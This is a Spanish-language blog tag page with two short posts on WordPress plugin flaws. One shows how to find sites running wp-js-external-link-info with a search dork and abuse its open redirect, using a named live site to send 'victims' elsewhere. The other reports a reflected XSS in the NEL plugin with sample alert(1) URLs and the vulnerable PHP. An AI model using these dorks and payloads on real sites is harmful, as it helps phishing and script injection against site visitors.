Tag Archive WordPress

ByDrok3r

WordPress wp-js-external-link-info | Redireccionamiento

Algunos sitios que trabajan bajo el CMS de WordPress, utilizan un plugin llamado wp-js-external-link-info y aunque actualmente ha sido cerrado, algunos sitios aun lo tienen, y nos podemos aprovechar de este plugin para redirigir a una víctima de un sitio a otro.
Para poder hacer esto, utilizaremos el siguiente dork:
inurl:/wp-content/plugins/wp-js-external-link-info/redirect.php?url= 
El cual a grandes rasgos realiza una búsqueda de sitios, los cuales tengan en su URL el contenido indicado, en este caso el plugin wp-js-external-link-info.
De acuerdo a google tenemos alrededor de unos 137000 resultados que coinciden con nuestra búsqueda.
Seleccionamos cualquier sitio, por lo general la mayoría tienen a presentar el siguiente mensaje:
Lo importante es la URL, que en este caso es:
http://www.muenchen-international.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=
después del parámetro url debemos ingresar el link del sitio al que nosotros queramos redirigir a la víctima. por ejemplo
http://www.muenchen-international.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://r3dbird.blogspot.mx
Y en cuestión de segundos, la victima sera redirigida a otro sitio.
Mas informacion de plugin wp js external link info:
ByDrok3r

WordPress NEL (No External Links) Plugin | Vulnerable a XSS

WordPress NEL (No External Links) Plugin | Vulnerable a XSS

 

Fue reportada una vulnerabilidad en el plugin NEL (No External Links) de WordPress. Este plugin esta diseñado para los especialistas quienes venden en sus sitio web, el cual entre sus funciones tiene:

  • Estadísticas de clics salientes
  •  Enmascaramiento FullLink
  • Re-direccionamiento personalizado
  • Codificación en base64

Entre muchas otras. Durante un análisis de seguridad con ThunderScan por parte de DefenseCode se ha descubierto que el plugin para WordPress es vulnerable al XSS en su versión 3.5.17 e inferiores.

El proveedor del plugin resolvió los problemas de seguridad, sin embargo existen muchos sitios que aun no han actualizado, esto los pone en riesgo. La vulnerabilidad se encuentra presente en la version 3.5.17 e inferiores, actualmente el plugin esta en su versión 3.5.19.

XSS EJEMPLO:

Function:     echo
  Variable:     $_REQUEST['date1'], $_REQUEST['date2']
  Sample URL:  
http://Drok3r_web.com/wp-admin/options-general.php?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date1="><script>alert(1)</script>
  Sample URL:  
http://Drok3r_web.com/wp-admin/options-general.php?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date2="><script>alert(1)</script>
  File:         wp-noexternallinks\wp-noexternallinks-options.php
    ---------
    125    $date1 = $_REQUEST['date1'];
    ...
    129    $date2 = $_REQUEST['date2'];
    ...
    134    <input type="text" name="date1" value="<?php echo $date1;
?>"> <?php _e('to', 'wp-noexternallinks'); ?>
    135    <input type="text" name="date2" value="<?php echo $date2;
?>"><input type="submit"
    ---------